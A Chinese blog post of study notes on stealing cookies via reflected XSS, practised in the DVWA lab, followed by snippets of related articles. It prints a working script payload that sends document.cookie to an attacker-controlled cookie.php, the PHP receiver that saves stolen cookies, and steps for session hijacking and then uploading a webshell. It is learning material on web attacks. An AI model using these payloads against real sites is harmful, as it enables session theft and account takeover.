利用xss盗取cookie学习笔记

最新推荐文章于 2022-10-01 17:37:38 发布
最新推荐文章于 2022-10-01 17:37:38 发布
阅读量680 收藏
点赞数
分类专栏: xss
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_50597969/article/details/115672108
版权

利用xss盗取cookie

cookie介绍

Cookie 是在HTTP协议下,服务器或脚本可以维护客户工作站上信息的一种方式。Cookie是由web服务器保存在用户浏览器(客户端)上的小文本文件,它可以包含有关用户的信息。
目前有些Cookie是临时的,有些则是持续的。临时的Cookie只在浏览器上保存一段规定的时间,一旦超过规定的时间,该Cookie就会被系统清楚
服务器可以利用Cookie包含信息的任意性来筛选并经常性维护这些信息,以判断在HTTP传输中的状态。
Cookie最典型的应用是判定注册用户是否已经登录网站,用户可能会得到提示,是否在下一次进入此网站时保留用户信息以便简化登录手续,这些都是Cookie的功用。另一个重要应用场合是“购物车”之类的处理。用户可能会在一段时间内在同一家网站的不同页面中选择不同的商品,这些信息都会写入Cookies,以便在最后付款时提取信息。

反射型xss盗取cookie

url?uname=<script>document.location=http://ip/cookie.php?cookie="+document.cookie</script>
location-->重定向
重定向到恶意url

将链接发送到用户,用户点击即触发XSS漏洞。同时可以使用URL编码来迷惑用户。

可以在dvwa中尝试一下

cookie.php代码
<?php
$cookie=$_GET['cookie'];
file_put_contents('cookie.txt',$cookie);
?>

在dvwa对应界面   XSS(Reflected)(low)
url/?name=<script>document.location='http://127.0.0.1/对应文件夹/cookie.php?cookie="+document.cookie</script>#

可以在cookie.php所在文件夹下发现cookie.txt

利用cookie会话劫持

打开cookie.txt文件,找到Cookie值,访问目标站点,修改Cookie为Cookie.txt文件中的值
可抓包修改
从而直接进入index.php界面而不是login.php界面

劫持会话后的操作

1、进入后台寻找上传点等进一步利用漏洞上传一句话webshell

例如虚拟机在使用桥接模式时(可以直接访问本机的靶场)在dvwa中上传一个一句话木马,就能连接到本机、可以直接访问本机文件(非常可怕的一个操作!!!).

2、修改配置,查找敏感信息等

T0mrvvi1b3t
关注
专栏目录
网络安全实训课06cookies劫持
Xunuannuan的博客
01-06 526
cookies劫持 1、首先保证虚拟机中的kali系统能够和外部网络通信 查看设置----虚拟网络编辑器----桥接无线网卡-------虚拟机有线设置DHCP 2、ifconfig命令查看IP------ping测试 3、修改配置文件 vim /etc/apt/sources.list deb http://mirrors.ustc.edu.cn/kali kali-rolling m...
XSS漏洞学习笔记
qi_SJQ_的博客
12-31 2636
xss学习笔记
CookieStealer:如何通过 xss 抓取 cookie 用于教育目的的简单示例
05-30
饼干窃取者 这个存储库只是一个例子,如何通过 xss 获取 cookie 以用于教育目的。 免责声明 我对您的行为不承担任何责任。 此处提供的代码仅用于教育目的。 如果您发现一个带有代码注入漏洞的网站,请通知他们。 怎么跑 简单地说,您必须输入以下命令: # To install dependencies npm install # To run the servers npm run server 将运行两台服务器: 受害者服务器(在端口 8000) 攻击者服务器(端口 3000) 受害服务器上所有用户的 cookie 都将在攻击者服务器上重定向。 该XSS脚本的特殊之处在于,它不会每次都发送cookie,而仅在cookie更新时发送。 这可以保护攻击者服务器免受存储溢出的影响。
XSSCookie获取练习
0xcc'Blog
04-22 338
#0x00:Cookie获取(Get方式) #0x01:Cookie获取(Post方式) #0x02:XSS钓鱼获取账号密码 我们可以把恶意代码放到网站的后台,当用户点击此网站的连接时,页面会弹出一个输入账号密码的页面,如果用户的安全意识不高,输入的数据就会发送到我们的后台。 #0x03 ...
网络安全实验6 认识XSS & 盗取cookie
一半西瓜的博客
01-30 3977
赞赏码 & 联系方式 & 个人闲话 【实验名称】认识XSS&盗取cookie 【实验目的】 1.了解XSS漏洞 2. 掌握盗取Cookie的方法 【实验原理】 1.什么是XSS XSS又叫CSS (Cross Site Script) 也称为跨站,它是指攻击者利用网站程序对用户输入过滤不足,输入可以显示在页面上对其他用户造成影响的HTML...
理解xss-劫持会话
高野02blog
11-24 2984
xss-劫持会话攻击实验 Step01: 搭建好攻击者的Web服务器(LAMP或LNMP平台,phpstudy) http://192.168.195.127/cookie.php 验证PHP环境 (1)看端口 Web:80 mysql:3306 php:9000 (2)验证PHP文件能不能正常解析 网站的根目录 c:\phpstudy_pro\www 创建一个test.php文件 <?php phpinfo() ?> Step02:在攻击者的Web服务器的网站根目录下创建cookie.php
pikachu靶场之XSS学习笔记
Mbys_Lettuce的博客
10-01 466
XSS漏洞一直被评估为web漏洞中危害较大的漏洞,在OWASP TOP10的排名中一直属于前三的江湖地位。XSS是一种发生在前端浏览器端的漏洞,所以其危害的对象也是前端用户。形成XSS漏洞的主要原因是程序对输入和输出没有做合适的处理,导致“精心构造”的字符输出在前端时被浏览器当作有效代码解析执行从而产生危害。因此在XSS漏洞的防范上,一般会采用“对输入进行过滤”和“输出进行转义”的方式进行处理:输入过滤:对输入进行过滤,不允许可能导致XSS攻击的字符输入;
XSS学习笔记
m0_47599604的博客
03-18 575
XSS介绍以及分类 XSS介绍 XSS (cross site scripting)跨站脚本,较适合的方式应该叫做跨站脚本攻击,诞生于1996年,人们经常将跨站脚本攻击(cross site scripting)缩写为CSS,但这会层叠样式表(cascading style sheets,CSS )的缩写混淆,因此,有人把跨站脚本攻击缩写为XSS。 分类 反射型(非持久型): 攻击者事先做好攻击链接,需要欺骗用户自己去点击链接才能触发漏洞。 存储型(持久型): payl..
XSS漏洞基础学习笔记
部分学习记录
08-04 1270
包含一些基础的XSS学习XSS跨站脚本分类 XSS漏洞介绍 跨站脚本攻击(Cross Site Scripting),为了不和层叠样式表(Cascading Style Sheets,CSS)的缩写混淆。故将其缩写为XSS。恶意攻击者往Web页面插入恶意Script代码,当用户浏览该页时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击者的目的 反射型XSS 非持久型XSS,这种攻击往往具有一次性。攻击者通过邮件等形式将包含XSS代码的连接发送给正常用户,当用户点击时,服务器接收该用户的请
xss跨站脚本攻击-运维安全详细笔记
06-30
xss跨站脚本攻击是指攻击者利用网站没有对用户提交代码进行转义处理或者过滤不足的缺点,进而添加一些新代码,嵌入到Web页面中,使得其他用户访问都会执行相应的嵌入代码,从而盗取用户资料,利用用户身份进行某些...
xss漏洞-DVWA跨站攻击盗取用户cookie
CKT_GOD的博客
09-18 3596
程Kaedy.cn-www.kaedy.cn XSS跨站脚本攻击介绍 跨站脚本攻击英文全称为(Cross site Script)缩写为 CSS,但是为了和层叠样式表(Cascading Style Sheet)CSS 区分开来,所以在安全领域跨站脚本攻击叫做 XSS XSS 攻击简介 XSS 攻击通常指黑客通过往 Web 页面中插入恶意 Script 代码,当用户访问网页时恶意代码在用户的 浏览器中被执行,从而劫持用户浏览器窃取用户信息。 1、黑客加在特定 web 页面 index.html 中,加入
xss -- cookie获取
qq726232111的博客
09-11 689
0x0 cookie 简介 储存在用户本地终端上的数据,服务端可通过session会话获取cookie信息,cookie可用于身份验证,临时存储信息(商城网站的购物车)等 0x1 实验流程 用户点击构造链接 --> 发送cookie到指定服务器 --> 接收cookie保存到文件 0x2 实验环境 实验环境 window+phpstudy+dvwa dvwa中提供...
渗透测试 2 --- XSS、CSRF、文件上传、文件包含、反序列化漏洞
墨鱼菜鸡
07-11 3181
1、渗透测试 实用 浏览器插件 chrome、edge 插件:搜索 cookie,安装 cookie editor,打开插件,可以 导出 cookie HackBar :Hackbar是网络安全学习者常备的工具 (https://www.fujieace.com/hacker/tools/hackbar.html )。 ​解决Firefox插件-H...
web安全学习笔记(八) XSScookie劫持
qycc3391的博客
03-06 1624
上一文中提到XSS的分类,本文将演示如何通过XSS进行cookie劫持,并且伪装登录。 再cookie劫持中,有三种身份,分别是服务器,普通用户以及攻击者。这里使用本机和两台台虚拟机完成这项工作。基本思路如图所示: 首先,攻击者发现某个网站存在XSS漏洞,于是编写恶意代码。当用户访问带有恶意代码的网站时,会将通过恶意代码,将cookie发送给攻击者。当攻击者获取cookie后,便可以使用cook...
XSS平台获取cookie
weixin_43387567的博客
04-02 4318
今天,我学习xss平台获取cookie的时候,由于各种毛病获取不到cookie。现在复现成功了,所以把过程写出来,记录一下过程,希望对入门的朋友有用。 首先我们得自己搭建环境,互联网是非常危险的。 我平时都是用docker搭建需要的坏境,非常简单。 yum install -y docker #安装docker service docker start #启动docker docker sea...
xss漏洞测试(cookie的窃取和利用,钓鱼,键盘记录)
qq_43814486的博客
05-03 4026
cookie的窃取和利用
接收cookie代码与注入盗取cookie代码参考
longger_lee
03-13 2117
document.write('');alert(/XSS/) $cookie = $_GET['cookie']; //以GET方式获取cookie变量值 $ip = getenv ('REMOTE_ADDR'); //远程主机IP地址 $time=date('Y-m-d g:i:s'); //以“年-月-日 时:分:秒”的格式显示时间 $referer=
DVWA--XSS解题过程
weixin_30733003的博客
03-25 228
XSS概念:通常指黑客通过HTML注入纂改了网页,插入恶意脚本,从而在用户浏览网页时,控制用户浏览器的一种攻击。 XSS有三种: 反射型xss:只是简单地把用户输入的数据反射给浏览器,简单来说,黑客往往需要用户诱使用户点击一个恶意链接,才能攻击成功。 存储型XSS:将用户输入的数据存储在服务器端。 DOM XSS:通过修改页面的DOM节点形成的XSS。 反射型xss LOW等...
XSS获取cookie利用
kuxing100的专栏
07-11 1827
获取cookie利用代码cookie.asp xx msg = Request("msg")   //获取提交过来的msg变量,也就是cookie值 set fs = server.CreateObject("scripting.filesystemobject")//创建一个fs对象 set thisfile = fs.OpenTextFile(t
xss盗取cookie
最新发布
07-28
XSS(跨站脚本攻击)是一种常见的网络安全漏洞,攻击者通过在网页中插入恶意脚本来获取用户的敏感信息,如cookie。根据引用内容,可以看出这是一个关于XSS攻击的示例代码和描述。 引用\[1\]是一个PHP代码片段,它将...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值